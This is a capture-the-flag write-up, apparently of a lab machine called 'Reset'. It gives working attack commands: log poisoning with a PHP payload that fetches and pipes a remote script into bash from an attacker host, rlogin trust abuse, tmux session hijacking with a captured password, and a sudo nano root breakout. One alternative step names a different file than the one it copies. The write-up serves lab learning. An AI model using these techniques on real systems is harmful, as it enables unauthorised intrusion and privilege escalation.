1
2
3
4
5
6
██████╗░███████╗░██████╗███████╗████████╗  
██╔══██╗██╔════╝██╔════╝██╔════╝╚══██╔══╝  
██████╔╝█████╗░░╚█████╗░█████╗░░░░░██║░░░  
██╔══██╗██╔══╝░░░╚═══██╗██╔══╝░░░░░██║░░░  
██║░░██║███████╗██████╔╝███████╗░░░██║░░░  
╚═╝░░╚═╝╚══════╝╚═════╝░╚══════╝░░░╚═╝░░░

Box Summary

The box had an LFI in a web dashboard that allowed log poisoning, leading to a shell as www-data. From there, I found sadm was a trusted user via rlogin, so I created a local user with the same name and logged in without a password. Inside, I attached to an open tmux session and grabbed sadm‘s password. Finally, using a sudo nano privilege, I escalated to root with a quick breakout.

INFO

I started with a basic scan and found this:

1
2
3
4
5
22/tcp  open  ssh
80/tcp  open  http
512/tcp open  exec
513/tcp open  login
514/tcp open  shell

FOOTHOLD

Port 80 was running a web server with a simple Reset button. I tried submitting admin and it worked. Captured the request using CAIDO and saw the password exposed in plain text.


LFI

After logging into the Dashboard, I saw this:

Checking how the data was being loaded, I found this:

1
file=%2Fvar%2Flog%2Fapache2%2Faccess.log

So I threw in a standard Linux LFI wordlist and got some hits:


Poisoning Logs

From what I saw, the dashboard was reading log files like syslog and auth.log, so I decided to try log poisoning.

Used this:

1
curl -A "<?php system('curl 10.10.14.61/rev.sh|bash'); ?>" http://10.129.184.161/

Then accessed the log via LFI like this:

1
file=../../../../../../../var/log/apache2/access.log

And got a shell!


We can cat the user.txt file as www-data, located at /home/sadm/user.txt.

While exploring, I noticed that sadm was listed as a trusted user. We can see that rlogin is set up through the /etc/hosts.equiv file, and that file is present on the box.

Another interesting thing is that we can see the user sadm has an active tmux session.


SADM USER | RLOGIN

To use rlogin, I saw that sadm was listed as a trusted user in /etc/hosts.equiv. So locally I created a user with the same name:

1
2
3
4
5
sudo useradd sadm
sudo passwd sadm

su sadm
rlogin 10.129.184.161

Logged in without password !


TMUX Session

I had already noticed that there was a tmux session running as sadm. For those who don’t know, tmux lets you have multiple terminal windows in one session and stay connected even if you close the shell:

1
2
tmux ls
sadm_session: 1 windows (created Wed Jul 16 03:25:31 2025)
1
tmux a -t sadm_session

And.. we got sadm password!

Password: 7lE2PAfVHfjz4HpE


PrivEsc to ROOT

Logged in as sadm using the found password. Checked for sudo rights:

1
2
3
4
5
6
7
8
9
sadm@reset:~$ sudo -l
Matching Defaults entries for sadm on reset:
    env_reset, timestamp_timeout=-1, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User sadm may run the following commands on reset:
    (ALL) PASSWD: /usr/bin/nano /etc/firewall.sh
    (ALL) PASSWD: /usr/bin/tail /var/log/syslog
    (ALL) PASSWD: /usr/bin/tail /var/log/auth.log

The fact that I could run nano as sudo was perfect, just a classic breakout opportunity :D

1
2
3
4
5
6
7
sudo /usr/bin/nano /etc/firewall.sh

# Inside nano:
Ctrl + R
Ctrl + X

reset; sh 1>&0 2>&0

Alternative method I tried:

1
2
3
cp /bin/bash /tmp/bash && chmod +xs /tmp/shaka
cd /tmp/
./shaka -p

And got root access: